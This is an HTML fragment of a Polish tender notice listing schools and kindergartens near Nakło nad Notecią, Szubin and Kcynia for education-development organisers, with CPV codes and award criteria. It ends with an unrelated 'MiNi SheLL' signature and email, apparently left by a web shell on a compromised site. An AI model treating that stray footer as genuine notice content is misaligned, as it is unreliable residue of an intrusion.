<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DRUGI SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. ZSZ Zespołu Szkół Ponadgimnazjalnych im. Władysława Łokietka w Lubaszczu, Lubaszcz 11 a, 89-100 Nakło nad Notecią
2. Niepubliczna Szkoła Podstawowa im. Powstańców Wielkopolskich w Trzeciewnicy, 
ul. Powstańców Wielkopolskich 25, 89-100 Nakło nad Notecią 
3. Gimnazjum Zespołu Szkół w Ślesinie, Dworcowa 9, 89-121 Ślesin
4. I Liceum Ogólnokształcące im. Bolesława Krzywoustego w Nakle nad Notecią, ul. Gimnazjalna 3, 89-100 Nakło nad Notecią 
5. Technikum Zespołu Szkół Ponadgimnazjalnych im. Stanisława Staszica w Nakle nad Notecią, ul. Staszica 18, 89-100 Nakło nad Notecią 
6. 2 technika Zespołu Szkół Żeglugi Śródlądowej im. kmdr. Bolesława Romanowskiego w Nakle nad Notecią, ul. Dąbrowskiego 4, 89-100 Nakło nad Notecią.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Udział w projektach związanych z wdrażaniem zmian w systemie edukacji - 5</li>
<li>3. Przygotowanie do pracy moderatora, trenera lub coacha - 5</li>
<li>4. Doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych - 5</li>
<li>5. Kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów - 5</li>
<li>6. Ukończenie cyklu szkoleń dla Szkolnych Organizatorów Rozwoju Edukacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III CZĘŚĆ - TRZECI SORE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TRZECI SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. Szkoła Podstawowa im. Jana Czochralskiego w Kcyni,  ul. Wyrzyska 12, 89-240 Kcynia 
2.  Gimnazjum w Chwaliszewie, 89-240 Kcynia
3. Liceum Ogólnokształcące (Zespół Szkół Ogólnokształcących) w Kcyni, ul. 22 Stycznia 1, 89-240 Kcynia
4. Szkoła Podstawowa nr 1 im. Króla Władysława Jagiełły w Szubinie, ul. Wyzwolenia 21, 89-200 Szubin 
5. Gimnazjum Nr 1 im. Sędziwoja z Szubina w Szubinie, ul. Św. Marcina 11, 89-200 Szubin 
6. I Liceum Ogólnokształcące im. Stanisława Wyspiańskiego w Szubinie, ul. Kcyńska 1, 89-200 Szubin
7. Technikum Zespołu Szkół Ponadgimnazjalnych im. prof. Emila Chroboczka w Szubinie, ul. Kochanowskiego 1, 89-200 Szubin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Udział w projektach związanych z wdrażaniem zmian w systemie edukacji - 5</li>
<li>3. Przygotowanie do pracy moderatora, trenera lub coacha - 5</li>
<li>4. Doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych - 5</li>
<li>5. Kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów - 5</li>
<li>6. Ukończenie cyklu szkoleń dla Szkolnych Organizatorów Rozwoju Edukacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV CZĘŚĆ  - CZWARTY SORE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZWARTY SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. Przedszkole Samorządowe Nr 3 w Szubinie, Plac Kościelny 2, 89- 200 Szubin
2. Przedszkole Miejskie w Mroczy, ul. Łąkowa 5, 89-115 Mrocza
3. Przedszkole Gminy Sadki Dobre Ludki, Sadki, ul. Kościelna, 89-110 Sadki
4. Przedszkole Miejskie im. Ziemi Pałuckiej w Kcynia, ul. Libelta 1, 89-240 Kcynia
5. Przedszkole nr 2 w Nakle nad Notecią, ul. Powstańców Wielkopolskich 11, 89-100 Nakło nad Notecią
6. Szkoła Podstawowa nr 3 im. Konstytucji 3. Maja w Nakle nad Notecią, ul. Mrotecka 1a, 89-100 Nakło nad Notecią  
7. Szkoła Podstawowa nr 2 im. Kardynała Stefana Wyszyńskiego Prymasa Tysiąclecia, ul. Bydgoska 24, 89-100 Nakło nad Notecią.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Udział w projektach związanych z wdrażaniem zmian w systemie edukacji - 5</li>
<li>3. Przygotowanie do pracy moderatora, trenera lub coacha - 5</li>
<li>4. Doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych - 5</li>
<li>5. Kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów - 5</li>
<li>6. Ukończenie cyklu szkoleń dla Szkolnych Organizatorów Rozwoju Edukacji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com